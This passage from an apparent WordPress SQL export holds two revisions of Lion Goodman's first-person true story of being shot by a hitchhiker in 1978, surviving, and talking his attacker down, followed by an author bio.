were camped out next to Puddingstone Reservoir east of Claremont. I was sitting on the floor in the back of the large van, moving things around in the cupboards to make more room for my clothes, books, food, boxes of samples, and Ray’s duffel bag and travel gear.\r\n\r\nThere was a loud explosion, and I felt a sharp, searing blow to the top of my head. Had the gas stove exploded? I looked up, but it was intact. Then I looked at Ray, sitting in the driver’s seat, and I saw the black gun in his hand. His arm was resting on the back of the seat, aiming the pistol at my face. A bullet had hit me! At first, I thought he was warning me – that he was going to rob me. That suddenly seemed fine. “Take it all,” I thought. “Take it all. Just leave me outside and drive away.”\r\n\r\nAnother explosion shook me, and my ears rang with a terrible, high-pitched whine. I felt blood dripping down my face. The top of my head throbbed. He’s not warning me, I realized. He’s going to kill me. I am going to die.\r\n\r\nThere was no place to hide. I was stuck in an uncomfortable position surrounded by cabinets. There was nothing I could do. I heard myself whisper “Relax. It’s out of your control. Breathe. Stay awake.” My thoughts turned to death, and to God. “Thy will, not my will, be done.” I let my body go, and I relaxed, slumping back against the cabinet. I watched my breath flow in and out, in and out, in and out….\r\n\r\nI began preparing for my death. I asked to be forgiven by anyone I had hurt. I offered my forgiveness to everyone who had hurt me throughout my life. It was a full-color fast-reverse movie reel of my entire twenty-six years. I thought about my parents, my brothers and sisters, my lovers, my friends. I said goodbye. I said, “I love you.”\r\n\r\nAnother explosion shook the van, and my body pulsed. I was not hit. The bullet missed me by a fraction of an inch, penetrating the cupboard to my right. I relaxed back into the reverie of my life review. My luck could not hold out. If he held a revolver, there were three bullets to go. I hoped that the gun wasn’t a semi-automatic with a full clip.\r\n\r\nNothing mattered at that moment but to be at peace. My van, my money, my business, my knowledge, my personal history, my freedom—all became worthless, meaningless. In the face of dying, it was just dust in the wind.\r\n\r\nAll I had of value was my body and my life, and that was soon to be gone. My attention was focused on the spark of light I called my Self, and my consciousness began to expand outward, extending my awareness in space and time. I heard my instructions clearly: STAY AWAKE AND KEEP BREATHING.\r\n\r\nI prayed to my God, to the Great Spirit, to receive me with open arms. Love and light flowed through me, spreading out from my heart like a lighthouse beam, illuminating everything around me. The light itself grew inside me, expanding my awareness like a huge balloon until the van and its contents seemed small. A sense of peace and acceptance filled me. I knew I would soon be leaving my body. I could sense the timeline of my life, both backward through my history and forward to my death, and beyond. I saw the next bullet – a short distance into the future – leave the gun, jet toward my left temple, and exit with brains and blood on the right side of my head. I was filled with awe. To see life from this expanded perspective was like looking down into a dollhouse, seeing all the rooms at once, with every detail in sharp relief, so real and yet so unreal at the same time. I looked into the warm and welcoming golden light with calm and acceptance.\r\n\r\nThe fourth explosion shattered the silence, and my head was pushed violently to the side. The ringing in my ears was deafening. Warm blood rushed down my head and onto my arms and thighs, dripping onto the floor. But strangely, I found myself back in my body, not out of it. Still surrounded by light, love, and peace, I began looking inside my skull, trying to find the holes. Perhaps I could see light through them? I did a quick check of my feelings, abilities, thoughts, and sensations, looking for what might be missing. Surely the bullet had affected me. My head was throbbing, but I felt strangely normal.\r\n\r\nI decided to look at my assassin – to look death directly in the face. I picked up my head and turned my eyes toward him. He was shocked. Jumping up from his seat, he shouted, “Why aren’t you dead, man? You’re supposed to be dead!”\r\n\r\n“Here I am.” I said quietly.\r\n\r\n“That’s too weird! It’s just like my dream this morning! I kept shooting at him, but he wouldn’t die! But it wasn’t you in the dream, it was somebody else!”\r\n\r\nThis was very strange. Who was writing this script? I wondered. I began to speak slowly and calmly, trying to settle him down. If I could get him talking, I thought, maybe he wouldn’t shoot again. He kept yelling, “Shut up! Just shut up!” as he peered out the windows into the darkness. He nervously walked closer to me, gun in hand, examining my bloody head, trying to understand why the four bullets he had pumped into me hadn’t finished me off.\r\n\r\nI could still feel blood oozing down my face and could hear it dripping onto my shoulder. Ray said, “I don’t know why you aren’t dead, man. I shot you four times!”\r\n\r\n“Maybe I’m not supposed to die,” I said calmly.\r\n\r\n“Yeah, but I shot you!” he said, with disappointment and confusion in his voice. “I don’t know what to do.”\r\n\r\n“What do you want to do?” I asked.\r\n\r\n“I wanted to kill you, man, to take this van and drive away. Now I don’t know.” He seemed worried, uncertain. He was beginning to slow down, becoming less jumpy.\r\n\r\n“Why did you want to kill me?”\r\n\r\n“Because you had everything, and I had nothing. And I was tired of having nothing. This was my chance to have it all.” He was still pacing back and forth in the van, looking out the windows at the black night outside.\r\n\r\n”What do you want to do now?” I asked.\r\n\r\n“I don’t know, man,” he complained. “Maybe I should take you to the hospital.”\r\n\r\nMy heart leapt at this opportunity, this chance – a way out. “Okay,” I said, not wanting to make him feel out of control. I wanted it to be his idea, not mine. I knew that his anger sprang from feeling out of control, and I didn’t want to make him feel more angry.\r\n\r\n“Why were you so nice to me, man?” he asked plaintively.\r\n\r\n“Because you’re a person, Ray.”\r\n\r\n“But I wanted to kill you! I kept taking out my gun and pointing it at you, when you were asleep or not looking. But you were being so nice to me, I couldn’t do it.” He seemed forlorn, as if he were a little boy, disappointed in himself for failing.\r\n\r\nMy time sense was altered. I floated in a zone of ultra-reality, with no idea of how much time had passed since the first bullet. After what felt like many minutes, Ray came up to me, still in my crouched, locked-in position, and said, “Okay, man, I’m going to take you to a hospital. But I don’t want you to move, so I’m going to put some stuff on you so you can’t move, okay?”\r\n\r\nNow he was asking my permission. “Okay,” I said softly. He began taking boxes filled with samples and stacked them around me. “Are you okay?” he asked.\r\n\r\n“Yeah, I’m okay. A little uncomfortable, but it’s all right.”\r\n\r\n“All right, man. I’m going to take you to a hospital I know of. Now don’t move. And don’t die on me, okay?”\r\n\r\n“Okay,” I promised. I knew I wouldn’t die. This light, this power inside me was so strong, so certain. Each breath felt like my first, not my last. I was going to survive. I knew it. Ray lowered the pop-top of the van, secured the straps, and started up the engine. I could feel the van backing up on the dirt road, finding the pavement and moving forward to my freedom.\r\n\r\nHe drove on and on – to where, I had no idea. Were we bound for a hospital, as he said, or toward some horrible fate? If he was capable of killing me with a gun, he was capable of lying, or worse. How did he know where to go? We were in Claremont. Los Angeles was more than an hour away. As I sat alone in the dark van, I re-played the scenes and analyzed the past three days, trying to understand what had happened, and why.\r\n\r\nAfter an hour or so of deep contemplation and questioning everything in my life, I felt the van slow, pull over and stop. The engine was turned off. Silence filled the space. I waited. It was still dark outside. We had not pulled into a driveway. There were no lights. This was not a hospital.\r\n\r\nRay walked back toward me with his gun in his hand. He pulled away one of the boxes and sat down on the platform bed, turning toward me. He looked distraught. His head hung down. His words cut deep through my cloud of hope. “I have to kill you, man,” he said calmly.\r\n\r\n“Why?” I asked quietly.\r\n\r\n“If I take you to the hospital, they’ll put me back in jail. I can’t go back to jail, man. I can’t.”\r\n\r\n“They wouldn’t put you in jail if you take me to the hospital,” I said slowly, still feigning injury, passivity. I knew that I might find an opening, a moment when I could surprise him, overpower him, take away his gun. As long as he didn’t know I was okay, I had an advantage.\r\n\r\n“Oh yes they would, man. They’d know I shot you, and they’d lock me up.”\r\n\r\n“We don’t have to tell them. I won’t tell them.”\r\n\r\n“I can’t trust you, man. I wish I could, but I can’t. I can’t go back to jail, that’s all. I have to kill you.” He seemed forlorn. This was not where he wanted to be. He wasn’t making any moves. His gun hung limply from his hand, pointed down toward the floor. The boxes were still stacked around me. I couldn’t judge how much strength I had, whether it would be enough to push out and wrestle him down. He was small but strong. Was he still full of adrenaline? That would make him even stronger. My strength lay in words, in verbal swordplay. If I could keep him talking, he might not take stronger action.\r\n\r\n“Maybe I could go into the hospital alone, Ray. You wouldn’t even have to be there. You could get away.”\r\n\r\n“No, man,” he said, shaking his head. “As soon as you told them, they’d come find me. They’d track me down.”\r\n\r\nI was silent. That didn’t work, I noted. What could I do to escape this danger? The only answer I could find was to stay present in the moment. Keep breathing. Be awake to everything.\r\n\r\nHe said, “Why aren’t you dead, man? I shot you four times in the head. How come you’re still alive and talking? You should be dead! I know I didn’t miss.” He looked again at my head, taking it in one hand and turning it to the left and right. “Does it hurt?” he asked. He seemed genuinely concerned.\r\n\r\n“Yeah, it hurts,” I lied. “But I think I’m going to be okay.”\r\n\r\n“Well, I don’t know what to do. I can’t take you to the hospital. I can’t just let you go, because you’ll go to the police. Why were you so damn nice to me, man? No one’s ever been that nice to me before. It made it harder to kill you. You kept buying me stuff, and giving me stuff. I just couldn’t decide when to do it.”\r\n\r\nNot if, but when.\r\n\r\n“What would you do with all this stuff if you had it, Ray?” I asked.\r\n\r\n“I could go home and be somebody, I could do stuff. I’d have enough money to buy my way out of there, man.” Ray began to talk, weaving his sad tale. I listened deeply. He talked about his home in East Los Angeles, the poverty around him, his anger, the schoolteachers who made him feel stupid, his father who drank too much and beat him, and being a tough guy on the streets. He talked about joining the army, how that was supposed to make it work, but he couldn’t stand being told what to do all the time, so he went AWOL.\r\n\r\nHe talked about dealing drugs, and drug deals going bad, and how he ripped off his dealer buddies. That’s why he had to leave L.A., because they were looking for him. He talked about stealing his father’s gun and money before he left. Then his car broke down, and he realized there was no place to hide.\r\n\r\nHe decided to turn back. He could do one more rip-off and get rich. He just needed one hit, one sucker. If his target was rich enough, he could pay off the dealers and start over. So he decided to kill whoever stopped. Whoever came by to help him.\r\n\r\nI volunteered.\r\n\r\nThe night was turning to morning, the sky shifting slowly from dark indigo to deep blue. The sound of chirping birds was the most beautiful sound I had ever heard. I was grateful to be alive.\r\n\r\n“I’m pretty stiff and sore, Ray.  I’d feel better if I could get up and stretch.” I was still in the same position I had been locked in for six hours. Dried blood was plastered to my hair and face, my shins hurt from being pushed against the edge of a cupboard door, and my lower back was throbbing with a deep ache. My head felt like I had been hit hard with a baseball bat.\r\n\r\n“Okay, man.  I’m going to let you up – but don’t do anything stupid, okay?”\r\n\r\n“Okay, Ray. You just tell me what to do and I’ll do it.”\r\n\r\nRemind him that he is in control. Don’t let him feel out of control. Look for an opening.\r\n\r\nHe moved the boxes from around me, stepped back with the gun in his hand, and opened the door. I crawled slowly out of the van, stretching upright for the first time. How beautiful the world was to my new eyes. Everything shone as if made of sparkling crystal.\r\n\r\nWe had stopped on a residential street near an embankment with a small pond at the bottom. He gestured down the dirt trail that led to the water. As I walked down the steep incline I thought, “Is this death again, tapping on my shoulder? Will he shoot me in the back and push me into the water?”\r\n\r\nI felt weak and vulnerable, yet simultaneously immortal and impervious to his bullets. I walked erect and unafraid. He followed me to the water’s edge and stood by as I squatted down and rinsed my bloodied hands and face, splashing cool, fresh water on myself. I stood up slowly and faced Ray. He looked at me curiously.\r\n\r\n“What would you do if I handed you this gun right now?” he asked, holding the gun out to me.\r\n\r\nMy answer was my first thought: “I’d throw it out there, into the water.”\r\n\r\n“Aren’t you mad at me, man?” he asked. He seemed incredulous.\r\n\r\n“No, why should I be mad?”\r\n\r\n“I shot you, man!  You ought to be angry! I’d be fucking furious! You wouldn’t want to kill me if I gave you this gun?”\r\n\r\n“No, Ray, I wouldn’t. Why should I?  I have my life, and you have yours.”\r\n\r\n“I don’t understand you, man. You are really weird – really different than anyone I’ve ever met before. And I don’t know why you didn’t die when I shot you.”\r\n\r\nSilence. Better left unanswered.\r\n\r\nAs we stood at the water’s edge, I realized that Ray had undergone as profound a transformation as I had. We were both different people than we had been the day before.\r\n\r\n“What should we do now, Ray?”\r\n\r\n“I don’t know, man. I can’t take you to the hospital. I can’t let you go. I don’t know what to do.”\r\n\r\nWe continued to talk, seeking a solution to his dilemma. We explored the possibilities – what could we agree to? I made suggestions, he told me why they wouldn’t work. I made other suggestions. He listened, considered, rejected, and relented. We sought a compromise.\r\n\r\nUltimately, we found a bargain we could agree to: I would let him go, and he would let me go. I promised not to turn him in or report him to the police, but under one condition – he had to promise that he would never do anything like this again.\r\n\r\nHe promised. What choice did he have?\r\n\r\nAs the sun rose over the hills, we climbed back into the van. I sat in the passenger seat and he drove to a place that was familiar to him. He parked, and turned off the engine. I gave him all the cash I had – about $200 – and a couple of watches I thought he could pawn. We got out of the van and walked together across the street to a bus stop.\r\n\r\nThe sun was shining. It was early in the day but already warm. He had his army jacket and sleeping bag under one arm, his duffel bag slung over his shoulder. Somewhere in the bundle there was a black gun.\r\n\r\nWe shook hands. I smiled at him, and he continued to look confused. Then I said goodbye and walked away.\r\n\r\nIn the emergency room of L.A. County Hospital, a doctor scraped away small bits of metal, skin and hair, and sewed stitches into my scalp. He asked me how it had happened, and I told him, “I was shot, four times.”\r\n\r\n“You’re a lucky man,” he said. “The two bullets that hit you both glanced off your skull. You have to report this to the police, you know.”\r\n\r\n“Yes, I know,” I said.\r\n\r\nHe called me lucky, but I knew it was more than luck – I felt blessed. I didn’t go to the police. I had made a promise and had received a promise in return.\r\n\r\n<strong>I kept my promise. </strong>\r\n\r\n<strong>And I believe that Ray kept his.</strong>\r\n<p style="text-align: center;">. . .</p>\r\n&nbsp;\r\n\r\n<strong>About the Author</strong>\r\n\r\nLion Goodman is an author, teacher, coach, and healer.  He shares his wisdom through his <strong><em>Clear Your Beliefs</em></strong> program, and teaches his methodology to coaches and therapists around the world.  He is the author of <em>Clear Your Beliefs,</em> and <em>Creating On Purpose</em> (with Anodea Judith).  He provides transformative coaching and healing to people worldwide, helping them clear what''s in the way, and fulfill their dreams and life purpose. He is passionate about developing leadership and resiliency in businesspeople and in youth.\r\n\r\nThis story was first published in the book, <em>I Thought My Father Was God…and Other True Tales from NPR’s National Story Project</em>, edited by Paul Auster (Henry Holt, October 2001). A short feature film, <strong><em>“The Kindness of Strangers,”</em> </strong>was produced based on this story. Directed by Claudia Myers, it won “Best Film” at the Rosebud Film Festival. The 20-minute film can be viewed here: <a href="www.EverydayAwakening.com/video.html">www.EverydayAwakening.com/video.html</a>.\r\n\r\nI would enjoy hearing your feedback. Write to me at liongoodman@gmail.com.\r\n\r\n© 2008 by Lion Goodman. All rights reserved.', 'My Near Death Story', '', 'inherit', 'closed', 'open', '', '2071-revision-v1', '', '', '2015-01-01 12:39:50', '2015-01-01 17:39:50', '', 2071, 'http://clearyourbeliefs.com/2071-revision-v1', 0, 'revision', '', 0),
(2075, 2, '2015-01-01 23:50:51', '2015-01-02 04:50:51', '<h1 style="text-align: center;">A Shot In The Light</h1>\r\n<h3 style="text-align: center;">(A true story)</h3>\r\n<h2 style="text-align: center;">by Lion Goodman</h2>\r\n&nbsp;\r\n\r\nIt happened during the summer of 1978. I was traveling through the Southwest, wandered through towns and cities, selling jewelry and giftware to stores along the way. I had just spent a productive week in Las Vegas, and felt pretty good about it. I was heading Los Angeles.\r\n\r\nIn the middle of the Mojave Desert, I saw a motorist whose car had broken down. The car''s hood was up, and he was staring helplessly into the motor, standing in the 100+ degree heat.  I pulled over to offer him assistance. He was down on his luck, had no plans, no money, and nowhere to go. So I invited him to travel with me, since I was headed into L.A.\r\n\r\nHis name was Ray, and he looked to be in his early twenties. He was small, muscular, wiry, and slightly gaunt, as if underfed. I felt sorry for him, and in the three days we were together, I grew to trust him. I sent him on small errands while I visited stores to sell my wares. At one point, I gave him some of my clothes, and it pleased him to have something new to wear. He seemed calm, and mostly satisfied.\r\n\r\nThe third night, we camped out next to Puddingstone Reservoir, east of Claremont. I was sitting on the floor in the back of the large van, moving things around in the cupboards to make more room for my clothes, books, food, boxes of samples, and Ray’s duffel bag and travel gear.\r\n\r\nThere was a loud explosion, and I felt a sharp, searing blow to the top of my head. Had the gas stove exploded? I looked up, but it was intact. Then I looked at Ray, sitting in the driver’s seat, and I saw the black gun in his hand. His arm was resting on the back of the seat, aiming the pistol at my face. A bullet had hit me! At first, I thought he was warning me – that he was going to rob me. That suddenly seemed fine. “Take it all,” I thought. “Take it all. Just leave me outside and drive away.”\r\n\r\nAnother explosion shook me, and my ears rang with a terrible, high-pitched whine. I felt blood dripping down my face. The top of my head throbbed. He’s not warning me, I realized. He’s going to kill me. I am going to die.\r\n\r\nThere was no place to hide. I was stuck in an uncomfortable position surrounded by cabinets. There was nothing I could do. I heard myself whisper “Relax. It’s out of your control. Breathe. Stay awake.” My thoughts turned to death, and to God. “Thy will, not my will, be done.” I let my body go, and I relaxed, slumping back against the cabinet. I watched my breath flow in and out, in and out, in and out….\r\n\r\nI began preparing for my death. I asked to be forgiven by anyone I had hurt. I offered my forgiveness to everyone who had hurt me throughout my life. It was a full-color fast-reverse movie reel of my entire twenty-six years. I thought about my parents, my brothers and sisters, my lovers, my friends. I said goodbye. I said, “I love you.”\r\n\r\nAnother explosion shook the van, and my body pulsed. I was not hit. The bullet missed me by a fraction of an inch, penetrating the cupboard to my right. I relaxed back into the reverie of my life review. My luck could not hold out. If he held a revolver, there were three bullets to go. I hoped that the gun wasn’t a semi-automatic with a full clip.\r\n\r\nNothing mattered at that moment but to be at peace. My van, my money, my business, my knowledge, my personal history, my freedom—all became worthless, meaningless. In the face of dying, it was just dust in the wind.\r\n\r\nAll I had of value was my body and my life, and that was soon to be gone. My attention was focused on the spark of light I called my Self, and my consciousness began to expand outward, extending my awareness in space and time. I heard my instructions clearly: STAY AWAKE AND KEEP BREATHING.\r\n\r\nI prayed to my God, to the Great Spirit, to receive me with open arms. Love and light flowed through me, spreading out from my heart like a lighthouse beam, illuminating everything around me. The light itself grew inside me, expanding my awareness like a huge balloon until the van and its contents seemed small. A sense of peace and acceptance filled me. I knew I would soon be leaving my body. I could sense the timeline of my life, both backward through my history and forward to my death, and beyond. I saw the next bullet – a short distance into the future – leave the gun, jet toward my left temple, and exit with brains and blood on the right side of my head. I was filled with awe. To see life from this expanded perspective was like looking down into a dollhouse, seeing all the rooms at once, with every detail in sharp relief, so real and yet so unreal at the same time. I looked into the warm and welcoming golden light with calm and acceptance.\r\n\r\nThe fourth explosion shattered the silence, and my head was pushed violently to the side. The ringing in my ears was deafening. Warm blood rushed down my head and onto my arms and thighs, dripping onto the floor. But strangely, I found myself back in my body, not out of it. Still surrounded by light, love, and peace, I began looking inside my skull, trying to find the holes. Perhaps I could see light through them? I did a quick check of my feelings, abilities, thoughts, and sensations, looking for what might be missing. Surely the bullet had affected me. My head was throbbing, but I felt strangely normal.\r\n\r\nI decided to look at my assassin – to look death directly in the face. I picked up my head and turned my eyes toward him. He was shocked. Jumping up from his seat, he shouted, “Why aren’t you dead, man? You’re supposed to be dead!”\r\n\r\n“Here I am.” I said quietly.\r\n\r\n“That’s too weird! It’s just like my dream this morning! I kept shooting at him, but he wouldn’t die! But it wasn’t you in the dream, it was somebody else!”\r\n\r\nThis was very strange. Who was writing this script? I wondered. I began to speak slowly and calmly, trying to settle him down. If I could get him talking, I thought, maybe he wouldn’t shoot again. He kept yelling, “Shut up! Just shut up!” as he peered out the windows into the darkness. He nervously walked closer to me, gun in hand, examining my bloody head, trying to understand why the four bullets he had pumped into me hadn’t finished me off.\r\n\r\nI could still feel blood oozing down my face and could hear it dripping onto my shoulder. Ray said, “I don’t know why you aren’t dead, man. I shot you four times!”\r\n\r\n“Maybe I’m not supposed to die,” I said calmly.\r\n\r\n“Yeah, but I shot you!” he said, with disappointment and confusion in his voice. “I don’t know what to do.”\r\n\r\n“What do you want to do?” I asked.\r\n\r\n“I wanted to kill you, man, to take this van and drive away. Now I don’t know.” He seemed worried, uncertain. He was beginning to slow down, becoming less jumpy.\r\n\r\n“Why did you want to kill me?”\r\n\r\n“Because you had everything, and I had nothing. And I was tired of having nothing. This was my chance to have it all.” He was still pacing back and forth in the van, looking out the windows at the black night outside.\r\n\r\n”What do you want to do now?” I asked.\r\n\r\n“I don’t know, man,” he complained. “Maybe I should take you to the hospital.”\r\n\r\nMy heart leapt at this opportunity, this chance – a way out. “Okay,” I said, not wanting to make him feel out of control. I wanted it to be his idea, not mine. I knew that his anger sprang from feeling out of control, and I didn’t want to make him feel more angry.\r\n\r\n“Why were you so nice to me, man?” he asked plaintively.\r\n\r\n“Because you’re a person, Ray.”\r\n\r\n“But I wanted to kill you! I kept taking out my gun and pointing it at you, when you were asleep or not looking. But you were being so nice to me, I couldn’t do it.” He seemed forlorn, as if he were a little boy, disappointed in himself for failing.\r\n\r\nMy time sense was altered. I floated in a zone of ultra-reality, with no idea of how much time had passed since the first bullet. After what felt like many minutes, Ray came up to me, still in my crouched, locked-in position, and said, “Okay, man, I’m going to take you to a hospital. But I don’t want you to move, so I’m going to put some stuff on you so you can’t move, okay?”\r\n\r\nNow he was asking my permission. “Okay,” I said softly. He began taking boxes filled with samples and stacked them around me. “Are you okay?” he asked.\r\n\r\n“Yeah, I’m okay. A little uncomfortable, but it’s all right.”\r\n\r\n“All right, man. I’m going to take you to a hospital I know of. Now don’t move. And don’t die on me, okay?”\r\n\r\n“Okay,” I promised. I knew I wouldn’t die. This light, this power inside me was so strong, so certain. Each breath felt like my first, not my last. I was going to survive. I knew it. Ray lowered the pop-top of the van, secured the straps, and started up the engine. I could feel the van backing up on the dirt road, finding the pavement and moving forward to my freedom.\r\n\r\nHe drove on and on – to where, I had no idea. Were we bound for a hospital, as he said, or toward some horrible fate? If he was capable of killing me with a gun, he was capable of lying, or worse. How did he know where to go? We were in Claremont. Los Angeles was more than an hour away. As I sat alone in the dark van, I re-played the scenes and analyzed the past three days, trying to understand what had happened, and why.\r\n\r\nAfter an hour or so of deep contemplation and questioning everything in my life, I felt the van slow, pull over and stop. The engine was turned off. Silence filled the space. I waited. It was still dark outside. We had not pulled into a driveway. There were no lights. This was not a hospital.\r\n\r\nRay walked back toward me with his gun in his hand. He pulled away one of the boxes and sat down on the platform bed, turning toward me. He looked distraught. His head hung down. His words cut deep through my cloud of hope. “I have to kill you, man,” he said calmly.\r\n\r\n“Why?” I asked quietly.\r\n\r\n“If I take you to the hospital, they’ll put me back in jail. I can’t go back to jail, man. I can’t.”\r\n\r\n“They wouldn’t put you in jail if you take me to the hospital,” I said slowly, still feigning injury, passivity. I knew that I might find an opening, a moment when I could surprise him, overpower him, take away his gun. As long as he didn’t know I was okay, I had an advantage.\r\n\r\n“Oh yes they would, man. They’d know I shot you, and they’d lock me up.”\r\n\r\n“We don’t have to tell them. I won’t tell them.”\r\n\r\n“I can’t trust you, man. I wish I could, but I can’t. I can’t go back to jail, that’s all. I have to kill you.” He seemed forlorn. This was not where he wanted to be. He wasn’t making any moves. His gun hung limply from his hand, pointed down toward the floor. The boxes were still stacked around me. I couldn’t judge how much strength I had, whether it would be enough to push out and wrestle him down. He was small but strong. Was he still full of adrenaline? That would make him even stronger. My strength lay in words, in verbal swordplay. If I could keep him talking, he might not take stronger action.\r\n\r\n“Maybe I could go into the hospital alone, Ray. You wouldn’t even have to be there. You could get away.”\r\n\r\n“No, man,” he said, shaking his head. “As soon as you told them, they’d come find me. They’d track me down.”\r\n\r\nI was silent. That didn’t work, I noted. What could I do to escape this danger? The only answer I could find was to stay present in the moment. Keep breathing. Be awake to everything.\r\n\r\nHe said, “Why aren’t you dead, man? I shot you four times in the head. How come you’re still alive and talking? You should be dead! I know I didn’t miss.” He looked again at my head, taking it in one hand and turning it to the left and right. “Does it hurt?” he asked. He seemed genuinely concerned.\r\n\r\n“Yeah, it hurts,” I lied. “But I think I’m going to be okay.”\r\n\r\n“Well, I don’t know what to do. I can’t take you to the hospital. I can’t just let you go, because you’ll go to the police. Why were you so damn nice to me, man? No one’s ever been that nice to me before. It made it harder to kill you. You kept buying me stuff, and giving me stuff. I just couldn’t decide when to do it.”\r\n\r\nNot if, but when.\r\n\r\n“What would you do with all this stuff if you had it, Ray?” I asked.\r\n\r\n“I could go home and be somebody, I could do stuff. I’d have enough money to buy my way out of there, man.” Ray began to talk, weaving his sad tale. I listened deeply. He talked about his home in East Los Angeles, the poverty around him, his anger, the schoolteachers who made him feel stupid, his father who drank too much and beat him, and being a tough guy on the streets. He talked about joining the army, how that was supposed to make it work, but he couldn’t stand being told what to do all the time, so he went AWOL.\r\n\r\nHe talked about dealing drugs, and drug deals going bad, and how he ripped off his dealer buddies. That’s why he had to leave L.A., because they were looking for him. He talked about stealing his father’s gun and money before he left. Then his car broke down, and he realized there was no place to hide.\r\n\r\nHe decided to turn back. He could do one more rip-off and get rich. He just needed one hit, one sucker. If his target was rich enough, he could pay off the dealers and start over. So he decided to kill whoever stopped. Whoever came by to help him.\r\n\r\nI volunteered.\r\n\r\nThe night was turning to morning, the sky shifting slowly from dark indigo to deep blue. The sound of chirping birds was the most beautiful sound I had ever heard. I was grateful to be alive.\r\n\r\n“I’m pretty stiff and sore, Ray.  I’d feel better if I could get up and stretch.” I was still in the same position I had been locked in for six hours. Dried blood was plastered to my hair and face, my shins hurt from being pushed against the edge of a cupboard door, and my lower back was throbbing with a deep ache. My head felt like I had been hit hard with a baseball bat.\r\n\r\n“Okay, man.  I’m going to let you up – but don’t do anything stupid, okay?”\r\n\r\n“Okay, Ray. You just tell me what to do and I’ll do it.”\r\n\r\nRemind him that he is in control. Don’t let him feel out of control. Look for an opening.\r\n\r\nHe moved the boxes from around me, stepped back with the gun in his hand, and opened the door. I crawled slowly out of the van, stretching upright for the first time. How beautiful the world was to my new eyes. Everything shone as if made of sparkling crystal.\r\n\r\nWe had stopped on a residential street near an embankment with a small pond at the bottom. He gestured down the dirt trail that led to the water. As I walked down the steep incline I thought, “Is this death again, tapping on my shoulder? Will he shoot me in the back and push me into the water?”\r\n\r\nI felt weak and vulnerable, yet simultaneously immortal and impervious to his bullets. I walked erect and unafraid. He followed me to the water’s edge and stood by as I squatted down and rinsed my bloodied hands and face, splashing cool, fresh water on myself. I stood up slowly and faced Ray. He looked at me curiously.\r\n\r\n“What would you do if I handed you this gun right now?” he asked, holding the gun out to me.\r\n\r\nMy answer was my first thought: “I’d throw it out there, into the water.”\r\n\r\n“Aren’t you mad at me, man?” he asked. He seemed incredulous.\r\n\r\n“No, why should I be mad?”\r\n\r\n“I shot you, man!  You ought to be angry! I’d be fucking furious! You wouldn’t want to kill me if I gave you this gun?”\r\n\r\n“No, Ray, I wouldn’t. Why should I?  I have my life, and you have yours.”\r\n\r\n“I don’t understand you, man. You are really weird – really different than anyone I’ve ever met before. And I don’t know why you didn’t die when I shot you.”\r\n\r\nSilence. Better left unanswered.\r\n\r\nAs we stood at the water’s edge, I realized that Ray had undergone as profound a transformation as I had. We were both different people than we had been the day before.\r\n\r\n“What should we do now, Ray?”\r\n\r\n“I don’t know, man. I can’t take you to the hospital. I can’t let you go. I don’t know what to do.”\r\n\r\nWe continued to talk, seeking a solution to his dilemma. We explored the possibilities – what could we agree to? I made suggestions, he told me why they wouldn’t work. I made other suggestions. He listened, considered, rejected, and relented. We sought a compromise.\r\n\r\nUltimately, we found a bargain we could agree to: I would let him go, and he would let me go. I promised not to turn him in or report him to the police, but under one condition – he had to promise that he would never do anything like this again.\r\n\r\nHe promised. What choice did he have?\r\n\r\nAs the sun rose over the hills, we climbed back into the van. I sat in the passenger seat and he drove to a place that was familiar to him. He parked, and turned off the engine. I gave him all the cash I had – about $200 – and a couple of watches I thought he could pawn. We got out of the van and walked together across the street to a bus stop.\r\n\r\nThe sun was shining. It was early in the day but already warm. He had his army jacket and sleeping bag under one arm, his duffel bag slung over his shoulder. Somewhere in the bundle there was a black gun.\r\n\r\nWe shook hands. I smiled at him, and he continued to look confused. Then I said goodbye and walked away.\r\n\r\nIn the emergency room of L.A. County Hospital, a doctor scraped away small bits of metal, skin and hair, and sewed stitches into my scalp. He asked me how it had happened, and I told him, “I was shot, four times.”\r\n\r\n“You’re a lucky man,” he said. “The two bullets that hit you both glanced off your skull. You have to report this to the police, you know.”\r\n\r\n“Yes, I know,” I said.\r\n\r\nHe called me lucky, but I knew it was more than luck – I felt blessed. I didn’t go to the police. I had made a promise and had received a promise in return.\r\n\r\n<strong>I kept my promise. </strong>\r\n\r\n<strong>And I believe that Ray kept his.</strong>\r\n<p style="text-align: center;">. . .</p>\r\n&nbsp;\r\n\r\n<strong>About the Author</strong>\r\n\r\nLion Goodman is an author, teacher, coach, and healer.  He shares his wisdom through his <strong><em>Clear Your Beliefs</em></strong> program, and teaches his methodology to coaches and therapists around the world.  He is the author of <em>Clear Your Beliefs,</em> and <em>Creating On Purpose</em> (with Anodea Judith).  He provides transformative coaching and healing to people worldwide, helping them clear what''s in the way so they can fulfill their dreams and manifest their life purpose. He is passionate about developing leadership and resiliency in businesspeople and in youth.\r\n\r\nThis story was first published in the book, <em>I Thought My Father Was God… and Other True Tales from NPR’s National Story Project</em>, edited by Paul Auster (Henry Holt, October 2001). A short feature film, <strong><em>“The Kindness of Strangers,”</em> </strong>was produced based on this story. Directed by Claudia Myers, it won “Best Film” at the Rosebud Film Festival. The 20-minute film can be viewed here: <a href="www.EverydayAwakening.com/video.html">www.EverydayAwakening.com/video.html</a>.\r\n\r\nI would enjoy hearing your feedback. Write to me at liongoodman@gmail.com.\r\n\r\n© 2008 by Lion Goodman. All rights reserved.', 'My Near Death Story', '', 'inherit', 'closed', 'open', '', '2071-revision-v1', '', '', '2015-01-01 23:50:51', '2015-01-02 04:50:51', '', 2071, 'http://clearyourbeliefs.com/2071-revision-v1', 0, 'revision', '', 0),
